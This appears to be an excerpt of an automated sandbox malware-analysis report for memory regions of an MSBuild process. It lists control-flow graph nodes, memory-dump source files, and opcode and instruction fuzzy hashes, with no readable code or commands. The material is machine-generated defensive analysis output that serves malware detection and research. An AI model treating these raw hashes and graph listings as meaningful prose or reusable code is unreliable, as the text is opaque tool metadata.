2b1e91e 3162->3164 3163->3155 3164->3163 3174 2b1ea24 3165->3174 3175 2b1e9fc-2b1ea22 3165->3175 3166->3165 3168 2b1efb5 3167->3168 3169 2b1efba 3167->3169 3168->3169 3169->3147 3176 2b1ea2e-2b1ea4e 3174->3176 3175->3176 3178 2b1ea54-2b1ea5e 3176->3178 3179 2b1ebcd-2b1ebd2 3176->3179 3180 2b1ea60 3178->3180 3181 2b1ea65-2b1ea8e 3178->3181 3182 2b1ebd4-2b1ebf4 3179->3182 3183 2b1ec36-2b1ec38 3179->3183 3180->3181 3185 2b1ea90-2b1ea9a 3181->3185 3186 2b1eaa8-2b1eaaa 3181->3186 3196 2b1ebf6-2b1ec1c 3182->3196 3197 2b1ec1e 3182->3197 3184 2b1ec3e-2b1ec5e 3183->3184 3187 2b1ef95-2b1ef96 3184->3187 3188 2b1ec64-2b1ec6e 3184->3188 3190 2b1eaa1-2b1eaa7 3185->3190 3191 2b1ea9c 3185->3191 3192 2b1eb49-2b1eb58 3186->3192 3195 2b1ef97-2b1ef99 3187->3195 3193 2b1ec70 3188->3193 3194 2b1ec75-2b1ec9e 3188->3194 3190->3186 3191->3190 3198 2b1eb5a 3192->3198 3199 2b1eb5f-2b1eb64 3192->3199 3193->3194 3202 2b1eca0-2b1ecaa 3194->3202 3203 2b1ecb8-2b1ecc6 3194->3203 3195->3167 3204 2b1ec28-2b1ec34 3196->3204 3197->3204 3198->3199 3200 2b1eb66-2b1eb76 3199->3200 3201 2b1eb8e-2b1eb90 3199->3201 3205 2b1eb78 3200->3205 3206 2b1eb7d-2b1eb8c 3200->3206 3207 2b1eb96-2b1ebaa 3201->3207 3208 2b1ecb1-2b1ecb7 3202->3208 3209 2b1ecac 3202->3209 3210 2b1ed65-2b1ed74 3203->3210 3204->3184 3205->3206 3206->3207 3212 2b1ebb0-2b1ebc8 3207->3212 3213 2b1eaaf-2b1eaca 3207->3213 3208->3203 3209->3208 3214 2b1ed76 3210->3214 3215 2b1ed7b-2b1ed80 3210->3215 3212->3195 3216 2b1ead1-2b1eb3b 3213->3216 3217 2b1eacc 3213->3217 3214->3215 3218 2b1ed82-2b1ed92 3215->3218 3219 2b1edaa-2b1edac 3215->3219 3238 2b1eb42-2b1eb48 3216->3238 3239 2b1eb3d 3216->3239 3217->3216 3221 2b1ed94 3218->3221 3222 2b1ed99-2b1eda8 3218->3222 3220 2b1edb2-2b1edc6 3219->3220 3223 2b1eccb-2b1ece6 3220->3223 3224 2b1edcc-2b1ee35 call 2b159d0 * 2 3220->3224 3221->3222 3222->3220 3227 2b1ece8 3223->3227 3228 2b1eced-2b1ed57 3223->3228 3236 2b1ee37-2b1ee39 3224->3236 3237 2b1ee3e-2b1ef91 3224->3237 3227->3228 3243 2b1ed59 3228->3243 3244 2b1ed5e-2b1ed64 3228->3244 3240 2b1ef92-2b1ef93 3236->3240 3237->3240 3238->3192 3239->3238 3240->3148 3243->3244 3244->3210
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fa8d5d1952cc78c1ddecd2ca3f8c6f715c3807db5af811ef7ca230b3dcbca5b9
                                                • Instruction ID: 04e12a8fd1364adcc4ac2db8fff3dac59673b1a0429660707090bf45cf253ef2
                                                • Opcode Fuzzy Hash: fa8d5d1952cc78c1ddecd2ca3f8c6f715c3807db5af811ef7ca230b3dcbca5b9
                                                • Instruction Fuzzy Hash: 6F72BF74E01229CFDB64DF69C884BE9BBB2BB49300F5481E9D849A7355EB349E81CF40
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 95cda79e79c82bb899588f623fa2f4eb6087389f4805a807dcaabf57c9dc0517
                                                • Instruction ID: c5921bdaa31845930ef9e50cb59726e58cb7fa90d7ef63a8b00f531727d4aa0b
                                                • Opcode Fuzzy Hash: 95cda79e79c82bb899588f623fa2f4eb6087389f4805a807dcaabf57c9dc0517
                                                • Instruction Fuzzy Hash: 88127A70A002199FDB14DF69D854BAEBBFAFF88304F548569E80A9B394DF309D45CB90

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 4039 2b16730-2b16766 4166 2b16768 call 2b16730 4039->4166 4167 2b16768 call 2b16880 4039->4167 4168 2b16768 call 2b16108 4039->4168 4040 2b1676e-2b16774 4041 2b167c4-2b167c8 4040->4041 4042 2b16776-2b1677a 4040->4042 4045 2b167ca-2b167d9 4041->4045 4046 2b167df-2b167f3 4041->4046 4043 2b16789-2b16790 4042->4043 4044 2b1677c-2b16781 4042->4044 4049 2b16866-2b168a3 4043->4049 4050 2b16796-2b1679d 4043->4050 4044->4043 4047 2b16805-2b1680f 4045->4047 4048 2b167db-2b167dd 4045->4048 4051 2b167fb-2b16802 4046->4051 4164 2b167f5 call 2b19851 4046->4164 4165 2b167f5 call 2b19858 4046->4165 4053 2b16811-2b16817 4047->4053 4054 2b16819-2b1681d 4047->4054 4048->4051 4061 2b168a5-2b168ab 4049->4061 4062 2b168ae-2b168ce 4049->4062 4050->4041 4052 2b1679f-2b167a3 4050->4052 4055 2b167b2-2b167b9 4052->4055 4056 2b167a5-2b167aa 4052->4056 4057 2b16825-2b1685f 4053->4057 4054->4057 4059 2b1681f 4054->4059 4055->4049 4060 2b167bf-2b167c2 4055->4060 4056->4055 4057->4049 4059->4057 4060->4051 4061->4062 4067 2b168d0 4062->4067 4068 2b168d5-2b168dc 4062->4068 4070 2b16c64-2b16c6d 4067->4070 4071 2b168de-2b168e9 4068->4071 4072 2b16c75-2b16c82 4071->4072 4073 2b168ef-2b16902 4071->4073 4078 2b16904-2b16912 4073->4078 4079 2b16918-2b16933 4073->4079 4078->4079 4082 2b16bec-2b16bf3 4078->4082 4083 2b16935-2b1693b 4079->4083 4084 2b16957-2b1695a 4079->4084 4082->4070 4087 2b16bf5-2b16bf7 4082->4087 4085 2b16944-2b16947 4083->4085 4086 2b1693d 4083->4086 4088 2b16960-2b16963 4084->4088 4089 2b16ab4-2b16aba 4084->4089 4092 2b1697a-2b16980 4085->4092 4093 2b16949-2b1694c 4085->4093 4086->4085 4086->4089 4091 2b16ba6-2b16ba9 4086->4091 4086->4092 4094 2b16c06-2b16c0c 4087->4094 4095 2b16bf9-2b16bfe 4087->4095 4088->4089 4090 2b16969-2b1696f 4088->4090 4089->4091 4096 2b16ac0-2b16ac5 4089->4096 4090->4089 4097 2b16975 4090->4097 4098 2b16c70 4091->4098 4099 2b16baf-2b16bb5 4091->4099 4100 2b16982-2b16984 4092->4100 4101 2b16986-2b16988 4092->4101 4102 2b16952 4093->4102 4103 2b169e6-2b169ec 4093->4103 4094->4072 4104 2b16c0e-2b16c13 4094->4104 4095->4094 4096->4091 4097->4091 4098->4072 4108 2b16bb7-2b16bbf 4099->4108 4109 2b16bda-2b16bde 4099->4109 4110 2b16992-2b1699b 4100->4110 4101->4110 4102->4091 4103->4091 4107 2b169f2-2b169f8 4103->4107 4105 2b16c15-2b16c1a 4104->4105 4106 2b16c58-2b16c5b 4104->4106 4105->4098 4111 2b16c1c 4105->4111 4106->4098 4118 2b16c5d-2b16c62 4106->4118 4112 2b169fa-2b169fc 4107->4112 4113 2b169fe-2b16a00 4107->4113 4108->4072 4114 2b16bc5-2b16bd4 4108->4114 4109->4082 4117 2b16be0-2b16be6 4109->4117 4115 2b1699d-2b169a8 4110->4115 4116 2b169ae-2b169d6 4110->4116 4119 2b16c23-2b16c28 4111->4119 4120 2b16a0a-2b16a21 4112->4120 4113->4120 4114->4079 4114->4109 4115->4091 4115->4116 4138 2b16aca-2b16b00 4116->4138 4139 2b169dc-2b169e1 4116->4139 4117->4071 4117->4082 4118->4070 4118->4087 4121 2b16c4a-2b16c4c 4119->4121 4122 2b16c2a-2b16c2c 4119->4122 4131 2b16a23-2b16a3c 4120->4131 4132 2b16a4c-2b16a73 4120->4132 4121->4098 4129 2b16c4e-2b16c51 4121->4129 4126 2b16c3b-2b16c41 4122->4126 4127 2b16c2e-2b16c33 4122->4127 4126->4072 4130 2b16c43-2b16c48 4126->4130 4127->4126 4129->4106 4130->4121 4134 2b16c1e-2b16c21 4130->4134 4131->4138 4144 2b16a42-2b16a47 4131->4144 4132->4098 4143 2b16a79-2b16a7c 4132->4143 4134->4098 4134->4119 4145 2b16b02-2b16b06 4138->4145 4146 2b16b0d-2b16b15 4138->4146 4139->4138 4143->4098 4147 2b16a82-2b16aab 4143->4147 4144->4138 4148 2b16b25-2b16b29 4145->4148 4149 2b16b08-2b16b0b 4145->4149 4146->4098 4150 2b16b1b-2b16b20 4146->4150 4147->4138 4162 2b16aad-2b16ab2 4147->4162 4151 2b16b48-2b16b4c 4148->4151 4152 2b16b2b-2b16b31 4148->4152 4149->4146 4149->4148 4150->4091 4155 2b16b56-2b16b75 call 2b16e58 4151->4155 4156 2b16b4e-2b16b54 4151->4156 4152->4151 4154 2b16b33-2b16b3b 4152->4154 4154->4098 4157 2b16b41-2b16b46 4154->4157 4159 2b16b7b-2b16b7f 4155->4159 4156->4155 4156->4159 4157->4091 4159->4091 4160 2b16b81-2b16b9d 4159->4160 4160->4091 4162->4138 4164->4051 4165->4051 4166->4040 4167->4040 4168->4040
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ed262985f495958fd33c397fcefc8c00f777908b6476dddb8afd6397fd92387e
                                                • Instruction ID: 94c0de767dc22ebf5dfdb0036f2050f914b67b736b43cf5f1b93f2ff6eda5f56
                                                • Opcode Fuzzy Hash: ed262985f495958fd33c397fcefc8c00f777908b6476dddb8afd6397fd92387e
                                                • Instruction Fuzzy Hash: BC022F70A00219DFCB14DF69D984AAEBBB6FF88344F5580A9E815EB2A5DB30DD41CB50

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 4589 2b1b328-2b1b33b 4590 2b1b341-2b1b34a 4589->4590 4591 2b1b47a-2b1b481 4589->4591 4592 2b1b350-2b1b354 4590->4592 4593 2b1b484 4590->4593 4594 2b1b356 4592->4594 4595 2b1b36e-2b1b375 4592->4595 4598 2b1b489-2b1b491 4593->4598 4596 2b1b359-2b1b364 4594->4596 4595->4591 4597 2b1b37b-2b1b388 4595->4597 4596->4593 4599 2b1b36a-2b1b36c 4596->4599 4597->4591 4602 2b1b38e-2b1b3a1 4597->4602 4603 2b1b493-2b1b4b0 4598->4603 4604 2b1b4c7-2b1b4ca 4598->4604 4599->4595 4599->4596 4605 2b1b3a3 4602->4605 4606 2b1b3a6-2b1b3ae 4602->4606 4607 2b1b4b2-2b1b4c2 4603->4607 4608 2b1b4dc 4603->4608 4609 2b1b4d3-2b1b4d6 4604->4609 4610 2b1b4cc-2b1b4d1 4604->4610 4605->4606 4614 2b1b3b0-2b1b3b6 4606->4614 4615 2b1b41b-2b1b41d 4606->4615 4607->4604 4613 2b1b4de-2b1b4e2 4608->4613 4611 2b1b4e3-2b1b4f9 4609->4611 4612 2b1b4d8-2b1b4da 4609->4612 4610->4613 4622 2b1b4fb-2b1b520 4611->4622 4623 2b1b52f-2b1b604 call 2b13908 call 2b13428 4611->4623 4612->4607 4612->4608 4614->4615 4618 2b1b3b8-2b1b3be 4614->4618 4615->4591 4617 2b1b41f-2b1b425 4615->4617 4617->4591 4620 2b1b427-2b1b431 4617->4620 4618->4598 4621 2b1b3c4-2b1b3dc 4618->4621 4620->4598 4624 2b1b433-2b1b44b 4620->4624 4632 2b1b409-2b1b40c 4621->4632 4633 2b1b3de-2b1b3e4 4621->4633 4625 2b1b522 4622->4625 4626 2b1b527-2b1b52e 4622->4626 4653 2b1b606 4623->4653 4654 2b1b60b-2b1b62c call 2b14dc8 4623->4654 4635 2b1b470-2b1b473 4624->4635 4636 2b1b44d-2b1b453 4624->4636 4625->4626 4626->4623 4632->4593 4638 2b1b40e-2b1b411 4632->4638 4633->4598 4637 2b1b3ea-2b1b3fe 4633->4637 4635->4593 4642 2b1b475-2b1b478 4635->4642 4636->4598 4641 2b1b455-2b1b469 4636->4641 4637->4598 4648 2b1b404 4637->4648 4638->4593 4643 2b1b413-2b1b419 4638->4643 4641->4598 4649 2b1b46b 4641->4649 4642->4591 4642->4620 4643->4614 4643->4615 4648->4632 4649->4635 4653->4654 4656 2b1b631-2b1b63c 4654->4656 4657 2b1b643-2b1b647 4656->4657 4658 2b1b63e 4656->4658 4659 2b1b649-2b1b64a 4657->4659 4660 2b1b64c-2b1b653 4657->4660 4658->4657 4661 2b1b66b-2b1b6af 4659->4661 4662 2b1b655 4660->4662 4663 2b1b65a-2b1b668 4660->4663 4667 2b1b715-2b1b72c 4661->4667 4662->4663 4663->4661 4669 2b1b6b1-2b1b6c7 4667->4669 4670 2b1b72e-2b1b753 4667->4670 4673 2b1b6f1 4669->4673 4674 2b1b6c9-2b1b6d5 4669->4674 4676 2b1b755-2b1b76a 4670->4676 4677 2b1b76b 4670->4677 4680 2b1b6f7-2b1b714 4673->4680 4678 2b1b6d7-2b1b6dd 4674->4678 4679 2b1b6df-2b1b6e5 4674->4679 4676->4677 4683 2b1b76c 4677->4683 4681 2b1b6ef 4678->4681 4679->4681 4680->4667 4681->4680 4683->4683
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 81927ad8df88eb9a570dbfeca431c6261acea903214f37a692eb4a20460e78cc
                                                • Instruction ID: 5ca10bd9e4e78560dfe3de86be7ff576f90cb7818f51dd79bd75cce6a465589d
                                                • Opcode Fuzzy Hash: 81927ad8df88eb9a570dbfeca431c6261acea903214f37a692eb4a20460e78cc
                                                • Instruction Fuzzy Hash: 26E10474E00218DFDB14DFA9D884A9DBBB2FF58314F59C0A9E819AB361DB30A841CF50

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 4797 67885b0-67885d0 4798 67885d2 4797->4798 4799 67885d7-6788699 4797->4799 4798->4799 4804 678869f-67886bc 4799->4804 4805 6788a62-6788b60 4799->4805 4861 67886bf call 6751506 4804->4861 4862 67886bf call 67511c0 4804->4862 4863 67886bf call 67511b0 4804->4863 4808 6788b68-6788b6e 4805->4808 4809 6788b62-6788b67 4805->4809 4809->4808 4810 67886c4-67886dd 4856 67886df call 6757b8c 4810->4856 4857 67886df call 67577a8 4810->4857 4858 67886df call 6757588 4810->4858 4812 67886e4-6788706 4814 6788708 4812->4814 4815 678870d-6788716 4812->4815 4814->4815 4816 6788a55-6788a5b 4815->4816 4817 678871b-67887b3 4816->4817 4818 6788a61 4816->4818 4823 67887b9-67887f5 4817->4823 4824 678888b-67888ec 4817->4824 4818->4805 4859 67887fb call 6788e69 4823->4859 4860 67887fb call 6788b00 4823->4860 4835 67888ed-6788942 4824->4835 4831 6788801-678883c 4833 678883e-678885b 4831->4833 4834 6788886-6788889 4831->4834 4838 6788861-6788885 4833->4838 4834->4835 4840 6788948-6788a38 4835->4840 4841 6788a39-6788a4b 4835->4841 4838->4834 4840->4841 4842 6788a4d 4841->4842 4843 6788a52 4841->4843 4842->4843 4843->4816 4856->4812 4857->4812 4858->4812 4859->4831 4860->4831 4861->4810 4862->4810 4863->4810
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ee65d79d9fa7205b6e9b3b086d41afa2fa9aead4f5d99a435a570712a2fdf2c0
                                                • Instruction ID: 0c16307769b238fbbb15e1aa809f744dfa11979d507d6793a5fc01afd3bdd927
                                                • Opcode Fuzzy Hash: ee65d79d9fa7205b6e9b3b086d41afa2fa9aead4f5d99a435a570712a2fdf2c0
                                                • Instruction Fuzzy Hash: B7E1CF74E01218CFEB64DFA5C844B9DBBB2BF89300F2081AAD408A7395DB359E85CF11
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 47437c9b3c32f5470a6a19f5bd695fe4e9191ba3b734c883ae9fd149f4525a37
                                                • Instruction ID: 5bf138f5ccdcdac97f0c14d4ebc1e182419da1a730972719eaf5fa8fe6550ef1
                                                • Opcode Fuzzy Hash: 47437c9b3c32f5470a6a19f5bd695fe4e9191ba3b734c883ae9fd149f4525a37
                                                • Instruction Fuzzy Hash: 6FD19174E00318CFDB14DFA5D954BADBBB2BF89304F6081AAD809AB355DB359A81CF50
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 25a3cd2f5d0ac12cace7617668597e5797c8644e7bf7bcaeb0fd32bbec726bcc
                                                • Instruction ID: 50ffcd527e9ee79abd22d09fdda03e6e7b6593393ec700650be9896f53262d9c
                                                • Opcode Fuzzy Hash: 25a3cd2f5d0ac12cace7617668597e5797c8644e7bf7bcaeb0fd32bbec726bcc
                                                • Instruction Fuzzy Hash: 8FB146B0E45258CFDB55EFA5C488AADFFB2BF89300F6480AAC409AB255DB305D42DF51
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f487e6c3ec2e681a46a6c908f408c92c8895b9b120839a5e9f78bd5c92e7f8c4
                                                • Instruction ID: f8f3977bbce01c45d3e36dba74ee35e8bc19177ea4e3c13a7527e9ffbe3c196f
                                                • Opcode Fuzzy Hash: f487e6c3ec2e681a46a6c908f408c92c8895b9b120839a5e9f78bd5c92e7f8c4
                                                • Instruction Fuzzy Hash: B8B1C574A40219CFDB65EF25C988BE9BBB2BB48300F1081E9D559A7365DB309EC1CF40
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d1b4311f795e68e9d995fde627522a0c386eda9c22795db6a2cc465f77af02b0
                                                • Instruction ID: 8f05717bf5610d7447030935d0b8d9289a326cba780ce0f6ef9d00ba09b41b18
                                                • Opcode Fuzzy Hash: d1b4311f795e68e9d995fde627522a0c386eda9c22795db6a2cc465f77af02b0
                                                • Instruction Fuzzy Hash: 84A191B5E01218CFEB68DF6AC944B9DBBF2AF89300F14C0AAD40DA7255DB305A85CF50
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b4a56221d3194192bcd83a341e4037bf6f226763ffb78aa25811c661d9cec6da
                                                • Instruction ID: 11e97fc831610f025b4e2b13b8aa6763151ff7f4c4a59ba010adc043213a95a0
                                                • Opcode Fuzzy Hash: b4a56221d3194192bcd83a341e4037bf6f226763ffb78aa25811c661d9cec6da
                                                • Instruction Fuzzy Hash: C3A19F75E01228CFEB68DF6AC944B9DFAF2AF89300F14C0AAD40DA7255DB305A85CF50
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1dd2a1b20f2ecff27136b9a3d51aba89dc425fee00ca6aaee436d71e832e44e4
                                                • Instruction ID: 4942e6fe2fd79f8a8476a74dc5dc9347b80c9acf7ba8ba9db84c5027e90614f3
                                                • Opcode Fuzzy Hash: 1dd2a1b20f2ecff27136b9a3d51aba89dc425fee00ca6aaee436d71e832e44e4
                                                • Instruction Fuzzy Hash: 4AA1A2B5E012188FEB68DF6AC944B9DBBF2AF89300F14C0AAD50DA7255DB305A85CF50
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8bff7063333d8008c0d37c73cae21d6efcb451a2ef84f15068dc84c17f42347a
                                                • Instruction ID: 78adb002155499d8fcacf5b8d2e9e072a233439621c73a3e886745f05660600d
                                                • Opcode Fuzzy Hash: 8bff7063333d8008c0d37c73cae21d6efcb451a2ef84f15068dc84c17f42347a
                                                • Instruction Fuzzy Hash: 89A1A275E412188FEB68DF6AC944B9DBBF2BF89300F14C0AAD40DA7255DB345A85CF50
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1dee5ff5febc997fe66e4c3a161824c857c79a1bcedbb11ed6005694745634bf
                                                • Instruction ID: 9df74bef9e9d09b5f5803756146619d079353202aa9c32c0fabe0082780b205a
                                                • Opcode Fuzzy Hash: 1dee5ff5febc997fe66e4c3a161824c857c79a1bcedbb11ed6005694745634bf
                                                • Instruction Fuzzy Hash: CDA19F74E41228CFEB68DF6AC944B9DBBF2AF89300F14C1AAD40CA7255DB305A85CF51
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f5b460338a227082776dceea5a27e79781796194f78d69de50228b3ba09868c1
                                                • Instruction ID: ba539370d6bae70ebb61976ea331968e935cc379ed7496845102b22ada29714c
                                                • Opcode Fuzzy Hash: f5b460338a227082776dceea5a27e79781796194f78d69de50228b3ba09868c1
                                                • Instruction Fuzzy Hash: 6BA1A275E01218CFEB68DF6AD944B9DBBF2AF89300F14C0AAD40DA7255DB305A85CF50
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5096d49f0d61073686c0e6648fb2e6d0f0b56675caa56edf5ad036779d3c138b
                                                • Instruction ID: 966476e513c19d266133940eff2ee82fd2dff49cd5d2d6fafbf1dad29f726b6c
                                                • Opcode Fuzzy Hash: 5096d49f0d61073686c0e6648fb2e6d0f0b56675caa56edf5ad036779d3c138b
                                                • Instruction Fuzzy Hash: ADA19175E012288FEB68DF6AC944B9DFBF2AF89300F14C1AAD40DA7255DB345A85CF50
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b45b6565e00e2b910175ddc17a42a10f07378ea94b58d1eaaea6c09c7579b870
                                                • Instruction ID: 37de25ffecb873009f3fe015c8a670e24bfea91f8bdcb09b9a1ad79db9595fad
                                                • Opcode Fuzzy Hash: b45b6565e00e2b910175ddc17a42a10f07378ea94b58d1eaaea6c09c7579b870
                                                • Instruction Fuzzy Hash: A5A1A275E012188FEB68DF6AC944B9DFBF2AF89300F14C0AAD50DA7255DB305A85CF60
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8d2fc6e91492927ab06c02a9af1a9f14c1ce733a83109f1865b73e8ca05a6977
                                                • Instruction ID: abed26683308aceb07327197ea129216ed29c59c947eff586659dfca04e75b58
                                                • Opcode Fuzzy Hash: 8d2fc6e91492927ab06c02a9af1a9f14c1ce733a83109f1865b73e8ca05a6977
                                                • Instruction Fuzzy Hash: DDA192B5E012188FEB68DF6AC944B9DFBF2AF89300F14C1AAD40DA7255DB345A85CF50
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f33cf697d18926121ff00c780b6badce4abb7f69311ca97eaa0a22ff3a615d7b
                                                • Instruction ID: 0bc57139e25501302454700a8e2da44e95b3b4449138a5b54bc358c9e8bdb98f
                                                • Opcode Fuzzy Hash: f33cf697d18926121ff00c780b6badce4abb7f69311ca97eaa0a22ff3a615d7b
                                                • Instruction Fuzzy Hash: 5A81B374E40218DFDB14DFA9D884BADBBF2BF89300F1480AAD549AB355DB309942CF11
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8172d635bfa054764d889866a77303a126b1472317943a4f967da7611cae74b9
                                                • Instruction ID: e1f90084a763dd88fcdb79db90394729d53f99b01697a84109b150d0a9814702
                                                • Opcode Fuzzy Hash: 8172d635bfa054764d889866a77303a126b1472317943a4f967da7611cae74b9
                                                • Instruction Fuzzy Hash: 4791B574E00258DFEB18DFA9D884A9DBBF2FF89304F5480A9D449AB365DB309946CF50
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5d01d5c2dd79645208dcf17ea2b26ed9973a7335fdc09acaa6d82d6478d2f6b0
                                                • Instruction ID: a8be32b931425859fb25b3d3de284979cdaf861fcd25338eb7e1f5d51e66f666
                                                • Opcode Fuzzy Hash: 5d01d5c2dd79645208dcf17ea2b26ed9973a7335fdc09acaa6d82d6478d2f6b0
                                                • Instruction Fuzzy Hash: 8881B374E40218DFEB14DFA9D884A9DBBF2FF88300F5480AAE409AB355DB319985CF51
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 11e1eadef633d91ab16e33ae0a85c82ad8760611e091d8359ccd0a26a17f8c7d
                                                • Instruction ID: 29910867483b01d7eeb070f266d28ced3263cde95a7c0359a4d7c36ca623176b
